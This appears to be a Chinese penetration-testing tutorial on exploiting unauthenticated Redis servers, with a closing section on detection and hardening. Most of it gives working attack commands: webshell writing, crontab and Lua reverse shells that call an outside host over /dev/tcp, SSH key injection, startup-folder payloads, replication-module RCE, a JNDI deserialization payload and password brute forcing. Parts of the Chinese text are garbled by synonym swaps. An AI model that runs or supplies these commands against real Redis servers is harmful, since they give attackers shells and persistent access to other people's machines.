环境搭建
分别搭建windows和linux的测试环境。官方给出redis的windows版本最新为3.x。windows下载地址:https://github.com/microsoftarchive/redis/releases下载Redis-x64-3.2.100.zip解压到本地目录下。
修正配置文件redis.windows.conf ,开启远程访问,关闭保护模式。修正bind 127.0.0.1为bind 0.0.0.0修正protected-mode yes为protected-mode no
指定redis.windows.conf配置文件,启动redis做事。
redis-server.exe redis.windows.conf
利用redis-cli.exe成功连接redis做事。
linux下载地址:最新版为6.0.1,可以选择须要的版本进行下载。http://download.redis.io/releases/redis-6.0.1.tar.gz
利用wget命令下载
$ wget http://download.redis.io/releases/redis-6.0.1.tar.gz
$ tar xzf redis-6.0.1.tar.gz
$ cd redis-6.0.1
$ make
编译后,进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
ls
cp redis.conf /etc/
修正redis.conf和windows下配置相同,开启外部访问,关闭保护模式。
启动redis做事
redis-server /etc/redis.conf
成功连接redis做事。
redis-cli -h 172.16.86.136
二、攻击类型redis默认情形下没有设置密码,在没有设置IP访问限定的情形下,可以通过redis写入文件进行干系利用。
适用范围:windows,linux版本。
利用条件:1、目标存在web目录2、已知web绝对路径3、存在写入权限利用过程:利用redis写入一个webshell到目标web目录下。
config set dir "C:/phpstudy_pro/WWW/web"
config set dbfilename info.php
set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
save
\r\n\r\n代表换行的意思,用redis入的文件会自带一些版本信息,如果不换行可能会导致无法实行。
成功写入文件。
操持任务反弹shell
利用范围:centos利用条件:1、权限可写操持任务利用过程:在权限足够的情形下,利用redis写入文件到操持任务目录下实行。首先监听端口。
nc -lvp 8899
利用redis天生操持任务配置文件。
config set dir /var/spool/cron
set tide "\n\n/1 /bin/bash -i>&/dev/tcp/x.x.x.x/8899 0>&1\n\n"
config set dbfilename root
save
在目标主机上成功添加了操持任务。
crontab -l
每一分钟实行一次,成功吸收到反弹的shell。
坑点:利用kali做为目标主机进行测试,须要写入操持任务到/var/spool/cron/crontabs目录下。创造当目标主机为centos时可以反弹shell成功,利用了ubuntu和debian均无法成功反弹shell。缘故原由:由于redis向任务操持文件里写内容涌现乱码而导致的语法缺点,而乱码是避免不了的,centos会忽略乱码去实行格式精确的任务操持。
写入公钥远程连接
利用范围:开启了密钥认证的linux主机利用条件:1、root权限2、开启了ssh密钥登录,存在/etc/.ssh文件利用过程:当redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录目标做事器。1、首先在centos靶机上开启ssh密钥登录。修正/etc/ssh/sshd_config配置文件。
RSAAuthentication设置为yes,意思是设置开启利用RSA算法的基于rhosts的安全验证;
PubkeyAuthentication设置为yes,意思是设置开启公钥验证;
AuthorizedKeyFiles后面的目录,是你上传的公钥所保存的文件;
重启做事
systemctl restart sshd.service
2、天生密钥
在kali中利用自带的命令天生一对密钥。
ssh-keygen -t rsa
3、将公钥内容导入key.txt文件
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
4、将天生的公钥内容设置为redis里的变量
cat /root/.ssh/key.txt | redis-cli -h x.x.x.x -x set tide
5、在 /root/.ssh 目录下天生authorized_keys文件。
redis-cli -h x.x.x.x
config set dir /root/.ssh
config set dbfilename authorized_keys
成功写入authorized_keys文件。
6、利用本地的私钥连接ssh
ssh -o StrictHostKeyChecking=no x.x.x.x
连接成功。
坑点:目标主机必须开启了密钥登录才能利用。ssh第一次连接时要加上 -o StrictHostKeyChecking=no,不然可能一贯连不上。
开机自启目录
当目标redis支配在windows主机上时,可以写入文件到自启动目录。当下次电脑重新启动时实行上线。
利用powershell远程下载实行。
server做事器默认存在Administrator用户。
写入批处理文件到Administrator用户的开机启动目录。
config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start
Menu/Programs/startup/"
config set dbfilename shell.bat
save
redis主从同步rce
利用范围redis 4.x-5.0.5在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以在redis中实现一个新的Redis命令,通过写c措辞并编译出.so文件。
git clone https://github.com/Ridter/redis-rce.git
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
编译so文件
cd RedisModules-ExecuteCommand/
ls
make
编译完后之后module.so到redis-rce目录下,运行命令:
python redis-rce.py -r x.x.x.x -L x.x.x.x -f module.so
-r参数是指目标redis IP地址
-L参数是指本机的ip地址
实行命令后,本机21000端口天生一个redis做事,然后目标redis指定本机为主理事器,同步实行so文件。实行成功后可以选择天生一个交互的shell,或者重新反弹一个shell。
反序列化rce
当碰着 redis 做事器写文件无法 getshell,可以查看redis数据是否符合序列化数据的特色。序列化数据类型分辨:
jackson:关注 json 工具是不是数组,第一个元素看起来像不像类名,例如
["com.blue.bean.User",xxx]
fastjson:关注有没有 @type 字段
jdk:首先看 value 是不是 base64,如果是解码后看里面有没有 java 报名
redis 反序列化实质上不是 redis 的漏洞,而是利用 redis 的运用反序列化了 redis 的数据而引起的漏洞,redis 是一个缓存做事器,用于存储一些缓存工具,以是在很多场景下 redis 里存储的都是各种序列化后的工具数据。两个常见场景:
一、java 程序要将用户登录后的 session 工具序列化缓存起来,这种场景是最常见的。
二、程序员常常会把 redis 和 ORM 框架整合起来,一些频繁被查询的数据就会被序列化存储到 redis 里,在被查询时就会优先从 redis 里将工具反序列化一遍。
redis一样平常存储的都是 java 序列化工具,php、python 比较少见,比较多的是 fastjson 和 jackson 类型的序列化数据,jdk 原生的序列化数据。由于要从 redis 反序列化工具,在工具类型非单一或少量的情形下程序员常日会选择开启 jackson 的 defaulttyping 和 fastjson 的 autotype,以是常日可以进行利用。
fastjson反序列化和java反序列化和jackson 反序列化利用事理相同,都是通过修改 redis 里面的反序列化数据,把恶意的序列化字节码存储进去,等到运用利用到它的时候就会反序列化触发漏洞,下面演示jackson 反序列化的利用过程。
jackson 反序列化利用
序列化:把Java工具转换为字节序列的过程。
反序列化:把字节序列规复为Java工具的过程。
jackson 反序列化漏洞汇总利用浅蓝大佬的springboot+redis+jackson的漏洞环境进行演示。
下载地址:https://github.com/iSafeBlue/redis-rce
首先搭建漏洞环境。
利用IDEA打开pom.xml文件,自动下载安装程序运行所需的依赖。
安装完成后,运行程序。
本地启动一个redis。
TestController.java 里写了两个接口,login 接口会把 User 工具直接存储到 redis。home 接口会将 username 参数当做 key 去 redis 里查询。
在"存储"和"查询"的时候实际上便是在"序列化"与"反序列化"。
这个过程如下:
调用login接口 -> 序列化User工具并存储到redis -> 调用home接口 -> 从redis取出数据并反序列化
如果掌握了redis,可以先调用login接口把User 工具序列化存储到redis,然后把redis里的这条序列化数据修改成恶意反序列化数据。末了去访问home接口,从redis中取出数据,从而导致触发了反序列化漏洞。
演示过程:访问login接口把数据存储到redis。
127.0.0.1:8080/login?username=nuoyan&password=123456
修正redis中的存储的数据为恶意反序列化数据,发起 JNDI 连接要求。
set nuoyan "[\"com.zaxxer.hikari.HikariConfig\",
{\"metricRegistry\":\"rmi://x.x.x.x:1098/jndi\"}]"
然后访问home接口,取出数据进行反序列化,成功弹出了打算器。
http://127.0.0.1:8080/home?username=nuoyan
lua rce
A-Team团队大佬提出的一种利用方法。干系细节可参考《在Redis中构建Lua虚拟机的稳定攻击路径》适用于高权限运行低版本redis的lua虚拟机,写文件失落败时进行考试测验。本地搭建了centos6.5+redis 2.6.16的实验环境利用info server 和 eval "return _VERSION" 0 命令可以查看当前redis版本和编译信息。
下载A-Team团队的exp
https://github.com/QAX-A-Team/redis_lua_exploit/
修正redis_lua.py中目标地址为靶机的ip地址。
运行攻击exp。
显示实行成功,可以进行命令实行了。
连接靶机redis实行反弹shell命令。
eval "tonumber('/bin/bash -i >& /dev/tcp/172.16.100.61/9999 0>&1', 8)" 0
成功吸收到反弹的shell。
redis密码爆破
当redis做事开放且设置了密码时,可以考试测验利用工具爆破。首先给redis设置密码,修正redis.conf,增加密码
requirepass admin@123
利用redis-cli连接,利用-a参数指定密码操作。
利用msf的auxiliary/scanner/redis/redis_login模块
设置爆破的目标地址,和字典文件,不建议利用默认字典文件。
成功爆破出密码为admin@123
三、Redis入侵检测和安全戒备
入侵检测
检测key
通过本地登录,通过"keys "命令查看,如果有入侵则个中会有很多的值,如图8所示,在keys 实行成功后,可以看到有trojan1和trojan2命令,实行get trojan1即可进行查看。
linux下须要检讨authorized_keys
Redis内建了名为crackit的key,也可以是其它值,同时Redis的conf文件中dir参数指向了/root/.ssh, /root/.ssh/authorized_keys 被覆盖或者包含Redis干系的内容,查看其值就可以知道是否被入侵过.
对网站进行webshell扫描和剖析
创造利用Redis账号漏洞的,则在shell中会存在Redis字样。
对做事器进行后门清查和处理
修复办法
(1)禁止公网开放Redis端口,可以在防火墙上禁用6379 Redis的端口
(2)检讨authorized_keys是否造孽,如果已经被修正,则可以重新天生并规复,不能利用修正过的文件。并重启ssh做事(service ssh restart)
(3)增加 Redis 密码验证
首先停滞REDIS做事,打开redis.conf配置文件(不同的配置文件,其路径可能不同)/etc/redis/6379.conf,找到# requirepass foobared去掉前面的#号,然后将foobared改为自己设定的密码,重新启动redis做事。
(4)修正conf文件禁止全网访问,打开6379.conf文件,找到bind0.0.0.0前面加上# (禁止全网访问)。
可参考加固修正命令
命令 描述
port 修正redis利用的默认端口
bind 设定redis监听的专用IP
requirepass 设定redis连接的密码
rename-command CONFIG "" 禁用CONFIG命令
rename-command info info2 重命名info为info2
磋商渗透测试及黑客技能,请关注并私信我。#小白入行网络安全# #安界网人才培养操持#
